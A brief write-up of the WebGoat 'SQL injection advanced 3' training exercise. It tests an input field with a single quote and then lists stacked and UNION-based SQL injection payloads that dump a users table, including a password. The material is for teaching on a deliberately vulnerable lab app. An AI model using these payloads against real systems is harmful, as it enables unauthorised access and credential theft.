WebGoat is really clear on this exercise
we can input a user name in the ‘Name’ text field and get some data back from the ‘user_data’ table, but what WebGoat is asking is to get all data (and Dave’s password) from the ‘user_system_data’ table by using a UNION query or by appending a second SQL query
By inputting a single quote we can test if the text field is vulnerable to SQLi
The error tells us that the single quote is breaking the SQL query, this means we can inject or queries as follows:
a'; select * from user_system_data; -- to get all the ‘user_system_data’ table content by appending a second SQL query
a' union select user_system_data.*,'1','1',1 from user_system_data; --
a' union select user_system_data.*,NULL,NULL,NULL from user_system_data; --either of these two and any other similar queries to get all the ‘user_system_data’ table content by means of a UNION query
if you need more help in understanding how a SQLi work, the best place I can refer is PortSwigger Academy
We have obtained Dave’s password (plus all the data) from the ‘user_system_data’ table as requested by the exercise
This concludes WebGoat SQL injection advanced 3
I hope you liked it
PVXs
